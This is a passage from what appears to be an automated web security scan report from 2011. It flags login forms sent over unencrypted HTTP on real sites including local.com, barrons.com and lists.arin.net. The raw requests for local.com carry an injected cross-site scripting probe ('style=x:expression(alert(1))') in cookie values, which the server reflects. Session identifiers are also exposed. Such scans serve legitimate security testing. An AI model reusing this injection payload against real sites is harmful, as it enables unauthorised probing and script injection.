...[SNIP]...

7.3. http://lists.arin.net/mailman/listinfo/arin-tech-discuss  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lists.arin.net
Path:   /mailman/listinfo/arin-tech-discuss

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /mailman/listinfo/arin-tech-discuss HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 12070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- $Revision: 2.4 $ -->
<!--
...[SNIP]...
<fieldset class="standard">
<FORM Method=POST ACTION="../subscribe/arin-tech-discuss">

<h3 class="mail_h3">
...[SNIP]...
</label>
<INPUT type="Password" name="pw" size="15"></li>
...[SNIP]...
</label>
<INPUT type="Password" name="pw-conf" size="15"></li>
...[SNIP]...

7.4. http://online.barrons.com/article/SB50001424052970203537304576017783391376872.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.barrons.com
Path:   /article/SB50001424052970203537304576017783391376872.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB50001424052970203537304576017783391376872.html HTTP/1.1
Host: online.barrons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache/2.0.58 (Unix)
X-DEBUG-BOX-IDENT: sbkj2kapachep04
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a
X-DEBUG-REQUEST: /article/SB50001424052970203537304576017783391376872.html
X-DEBUG-NAMESPACE: reno-barrons
Set-Cookie: djcs_route=3422cf49-4bc5-4845-811c-c9461f1059b1; domain=.barrons.com; path=/; Expires=Sun Jan 31 14:14:41 2021; max-age=315360000
X-DEBUG-BOX-IDENT: sbkj2kapachep04
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a
X-DEBUG-REQUEST: /entitlements_handler?mg=reno-barrons&url=http%3A%2F%2Fonline.barrons.com%2Farticle%2FSB50001424052970203537304576017783391376872.html
X-DEBUG-NAMESPACE: reno-barrons
X-DEBUG-BOX-IDENT: sbkj2kapachep04
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a
X-DEBUG-REQUEST: /public/article/SB50001424052970203537304576017783391376872.html
X-DEBUG-NAMESPACE: reno-barrons
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 19:14:56 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 92067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<li class="mainLogin hidden" id="nonSubLoginArea">

                       <form method="post" action="http://commerce.barrons.com/auth/submitlogin?mod=BOL_header_login" name="login_form" id="login_form">
<input name="url" value="http://online.barrons.com/home-page" type="hidden">
...[SNIP]...
<li class="loginPassword">Password: <input class="password" type="password" name="password" /></li>
...[SNIP]...

7.5. http://thestreet.adsonar.com/admin/advertisers/indexPl.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.adsonar.com
Path:   /admin/advertisers/indexPl.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /admin/advertisers/indexPl.jsp HTTP/1.1
Host: thestreet.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:22:29 GMT
Set-Cookie: JSESSIONID=0C3437813DF5779CC72D22EC06A15F49; Path=/admin
Set-Cookie: adm=0C3437813DF5779CC72D22EC06A15F49rwVyiUqocIA9l87ttz; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=804
Connection: Keep-Alive
Set-Cookie: NSC_benjo_fyufsobm_qppm=446c46713660;expires=Thu, 03-Feb-11 15:22:29 GMT;path=/
Content-Length: 16832


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<div id="formsSidebarAlreadyRegisteredInner" >
                   <form id="loginFrm" name="loginFrm" action="" method="post" onsubmit="return doLogin();">
                   <input type="hidden" id="plid" name="plid" value="272054">
...[SNIP]...
<br/>
                   <input type="password" name="pass" value="" /><br/>
...[SNIP]...

7.6. http://www.local.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28061
Date: Thu, 03 Feb 2011 16:50:12 GMT
Content-Length: 28061
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.7. http://www.local.com/business/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77820
Date: Thu, 03 Feb 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.8. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 116008
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:01 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/
Content-Length: 116008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.9. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 91928
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 91928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.10. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 115967
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 115967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.11. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116644
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.12. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; 